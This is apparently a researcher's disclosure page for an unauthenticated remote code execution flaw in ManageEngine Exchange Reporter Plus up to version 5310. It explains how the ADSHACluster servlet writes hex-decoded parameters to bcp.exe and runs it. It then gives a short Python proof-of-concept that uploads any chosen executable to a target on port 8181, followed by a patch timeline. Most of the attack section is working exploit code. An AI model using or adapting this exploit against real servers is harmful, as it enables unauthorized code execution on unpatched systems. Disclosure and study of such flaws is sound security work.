Introduction
How to create a Metasploit module in example? YouTube video
[PL] Jak stworzyć moduł do #Metasploit? Poradnik na YouTube
Java servlet ADSHACluster takes two parameters: BCP_RLL and BCP_EXE.
Received data are converted from hex encoding and save inside bin directory.
That's the way how bcp.rll and bcp.exe files are created.
Then exe file is executed using exec("cmd /c bcp.exe -?").
POC
ManageEngine Exchange Reporter Plus Unauthenticated Remote Code Execution
import urllib
file_to_execute = "calc.exe"
ip = "192.168.1.105"
def to_hex(s):
lst = []
for ch in s:
hv = hex(ord(ch)).replace('0x', '')
if len(hv) == 1:
hv = '0'+hv
lst.append(hv)
return reduce(lambda x,y:x+y, lst)
print "ManageEngine Exchange Reporter Plus <= 5310"
print "Unauthenticated Remote Code Execution"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "https://twitter.com/KacperSzurek"
print "https://www.youtube.com/c/KacperSzurek"
params = urllib.urlencode({'MTCALL': "nativeClient", "BCP_RLL" : "0102", 'BCP_EXE': to_hex(open(file_to_execute, "rb").read())})
f = urllib.urlopen("http://{}:8181/exchange/servlet/ADSHACluster".format(ip), params)
if '{"STATUS":"error"}' in f.read():
print "OK"
else:
print "ERROR"
Timeline
- 28-06-2018: Version 5311 released
- 28-06-2018: Release
